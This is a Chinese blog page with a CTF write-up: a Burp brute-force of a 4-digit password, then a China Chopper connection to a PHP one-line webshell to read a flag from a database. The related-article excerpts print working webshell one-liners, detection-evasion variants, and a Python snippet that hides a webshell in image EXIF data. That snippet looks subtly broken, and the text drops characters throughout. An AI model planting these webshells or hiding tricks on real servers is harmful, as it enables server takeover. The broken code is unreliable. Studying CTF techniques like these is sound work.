CTF-PHP一句话木马

破解CTF题目:从密码爆破到Flag获取
最新推荐文章于 2025-04-05 13:09:29 发布
原创 最新推荐文章于 2025-04-05 13:09:29 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细记录了一次CTF竞赛中破解四字密码的过程,利用Burp Suite进行密码爆破,并通过Grep-Extract模块定位正确密码。接着,使用菜刀工具连接一句话木马,成功获取数据库信息,最终编写查询语句获得Flag。

首先看一下题目

他是提示让你输入一个4位数的密码

 

使用burp进行密码爆破

 

我们使用burp来自动生成一个所有以4位数组成的密码

 

经过一段时间的爆破发现他的返回值都为192个字节,无法区别正确的密码。

 寻求大佬的求助得知,遇到这种情况时,在burp的intruder 选项中有个Grep-Extract 模块可以提取错误的返回包,从而得知正确的密码。

 现在就可以找到正确的密码了

 

 使用菜刀连接木马

因题意得知他是一个一句话木马题目,所以我们尝试使用菜刀连接该页面,密码为爆破出来的5276密码。

 连接成功

 接下来信息收集一下找到了他的数据库用户和密码

 使用数据库管理工具,配置数据库,连接到该数据库。

 在数据库中找到了ctf表  但是无法查看该表中数据。

 提取Flag

编写查询语句后成功得到flag (查询语句为:SELECT * FROM flag)

 

 

 

 

xyongsec
关注
ctf赛题上传php木马,从CTF题学习PHP反序列化漏洞
weixin_33551941的博客
03-17 1022
CTF题目前阵子,参加了CTF比赛,其中有条道题蛮有意思的,所以写出来分享下。此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下:class SoFun{protected $file='index.php';function __destruct(){if(!empty($this->file...
Web安全-句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 776
句话木马 句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php句话: <?php @eval($_POST['1']) ?> 用这段代码保存为php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的句话木马上传 回到首页,找到文件上传的网页 找到句话木马文件 使用蚁剑连接 拿到flag ...
免杀代码—— 句话php
01-15
收集于互联网,仅限个人研究使用。
CTFweb篇-句话木马
weixin_44597701的博客
08-05 6266
什么是句话木马 句话木马就是将段代码植入服务器中,然后通过蚁剑就可以直接拿到webshell 最简单的句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack,至于为什么,这需要祥看蚁剑的原理 为了防止D盾的阻拦,经常可以使用不同的混淆来绕开D盾 句话木马的条件 (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 例题 先用御剑扫描下 发现后台地址 然后进入输入root 密码空(至于为什
CTF-web题 句话木马
2302_80276789的博客
07-20 1075
php标签为框架,里面的东西七主要作用,@符号是指我们@谁,使不报错,eval是将后面里面的当作php代码执行,$_post[‘a’]为接受psot方法 来接受a这个参数a.可以将a传入system,系统命令等,就可以实现控制作用。链接密码为参数a,进行链接,然后添加。双击进入,此时服务器已经被我们控制。我们便可以查看服务器的文件,我们可以在根目录下找到个flag文件,点击进去,就可以得到flag。接下来使用中国蚁剑进行连接,打开之后,复制网址,点击右键,添加数据,将url添加进来。
CTF竞赛实战 中国菜刀与句话木马
热门推荐
keep coding
05-05 7万+
中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620.基本操作:往目标网站中加入句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的句话是:&lt;%eval request ("pass")%&gt;aspx的句话是:&lt;%@ P...
ctf PHP句话木马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...
weixin_33903769的博客
03-20 1580
CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,主要是写给我们萌新看的,大佬们轻喷。weak题目难度 ⭐php中有两种比较的符号 == 与 === ,=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较== 在进行比较的时候,会先将...
php简短句话木马免杀,免杀/句话木马(PHP)
weixin_39598568的博客
03-13 2893
前言在打CTF或渗透时,经常会遇到waf,普通的句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握句话木马的免杀。Webshell检测方式网上有很多免杀的句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下个payload。因此在此之前,先来了解下都有哪些检测方式。日志检测使用Web...
【Vulnhub靶机】JIS-CTF-VulnUpload-CTF01靶机
过期的秋刀鱼
08-28 1429
发现是个文件上传的界面,我们可以上传句话木马尝试得到。密码来读取flag.txt文件,你可以在个隐藏文件找到它。发现没有什么发现,继续 看看其他目录。身份执行哪些文件,发现有所有的权限。开启靶机,看见加载的进度条按。页面没反应,但是也没有报错,先查看我们靶机的网卡名称。文件里,又跟上传相关的。里发现第三个 flag。该靶机有5个flag。前往登录页面进行登录。,得到第五个flag。
【Vulnhub】之JIS-CTF-VulnUpload-CTF01
zg_111的博客
03-28 2164
此靶机共找到了5个flag,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag。
精简&明文免杀冰蝎php句话.php
10-30
php句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
Buuctf web Knife(句话木马)
2401_86312572的博客
12-30 389
连接密码即为代码中可被执行的参数,为什么呢,猜测中国蚁剑为句话木马集成了个环境,让我们可以不需要自己去给Syc赋值,只需要进行简单的可视化操作就可以了,因为赋值的过程非常复杂,明白原理即可。Syc作为个可赋值的对象,被post接收传入服务端,然后执行eval函数,这个函数可以将内部的信息执行为php代码,进而我们可以获得服务端的控制权。进入根目录即可找到flag。打开后是句话木马。我们使用中国蚁剑连接。
web入门—— 句话木马
最新发布
weixin_75168674的博客
04-05 1946
句话木马”是指只用句简单代码写成的Web 后门脚本,攻击者可以通过它远程控制网站服务器,上传/下载文件、执行命令、查看数据库等。它是 Web 渗透中最常见的种后门。
[SWPUCTF 2021 新生赛]caidao(句话木马+蚁剑)
2401_84499442的博客
07-07 622
种方法:直接post传参,首先eval函数是代码执行,那么我们就写入wllm=system('ls /'),查看服务器文件目录。很明显,这里的flag就是我们要找的文件,然后再执行wllm=system('cat /flag'),查看flag文件内容。当然,很明显,这里是句话木马,那么我们也可以用蚁剑。第步,因为他已经给出了密码“wllm”,那么我们就直接连接。然后从下往上依次查找文件,最终在/flga中找到flag。
有趣的PHP句话
aijin3040的博客
07-16 247
今天看到如下图所示的PHP句话,觉得挺有意思。 代码如下: <?=~$_='$<>/'^'{{{{';echo $_;@${$_}[_](@${$_}[__]);?> 效果图: 看下图注释应该就可以目了然了,就是根据异或运算得到$_=’_GET’。 如果想换成POST方法,则可变化如下。 <?=~$_='$+...
php句话大全,[各种句话木马大全]各种句话
weixin_39995351的博客
03-11 9247
PHP句话:1、普通句话2、防爆破句话 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗句话 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏句话preg_replace()方法中的e,只适用于php5及更早...
php注入句话,总结的php注入语句
weixin_42629522的博客
03-26 659
2008年02月24日 星期日 22:291.判断是否存在注入,加';and 1=1;and 1=22.判断版本 and ord(mid(version(),1,1))>51 代替。5.判断数据库连接帐号有没有写权限,and (select count(*) frommysql.user)>0select1,concat(char(124,13,10),SCHEMA_NAME,char...
php句话怎么写_php句话木马怎么写
weixin_29044713的博客
03-08 2252
php句话木马怎么写?PHP句话木马:关于PHP句话木马
句话木马融入图片中ctf
01-20
### CTF竞赛中将句话木马隐藏在图片中的技术细节 在CTF竞赛场景下,为了绕过检测并将句话木马植入目标服务器,可以采用将恶意代码嵌入看似无害的文件之中,比如图片。具体来说,种常见做法是利用PHP-GIF漏洞或相似机制,在不影响图像显示的前提下附加可执行脚本。 #### 利用EXIF元数据注入 可以通过修改图片文件内的EXIF信息部分来存储WebShell代码片段而不破坏其视觉呈现效果[^1]: ```php <?php @eval($_POST['cmd']); ?> ``` 此段落被巧妙地放置于GIF89a格式之后作为注释字段存在,当浏览器加载该资源时仅会解析图形而忽略后续字符;然而对于支持此类特性的应用层解释器而言,则能够识别并运行其中暗藏指令。 #### 使用Steganography隐写术 另种更为隐蔽的方式涉及到了信息隐藏领域——即steganographic techniques(隐写术),它允许秘密消息完全融入载体之内难以察觉。例如借助Python库`PIL`处理JPEG/PNG等位图结构内部冗余空间保存base64编码后的payload字符串[^2]: ```python from PIL import Image import base64 def encode_image_with_payload(image_path, payload): img = Image.open(image_path) encoded_img = image_path.replace('.jpg', '_encoded.jpg') with open(encoded_img, 'wb') as f: # Embed the Base64-encoded payload into EXIF comment field exif_data = { "Comment": b'<?php @assert(base64_decode("' + base64.b64encode(payload.encode()) + b'")); ?>' } img.save(f, format='JPEG', quality=95, optimize=True, progressive=True, **exif_data) # Example usage malicious_code = "<?php @eval($_POST['cmd']); ?>" encode_image_with_payload('benign_picture.jpg', malicious_code) ``` 上述方法均需注意实际操作环境的安全性和合法性验证,确保只用于授权测试范围内的渗透演练活动而非非法入侵行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值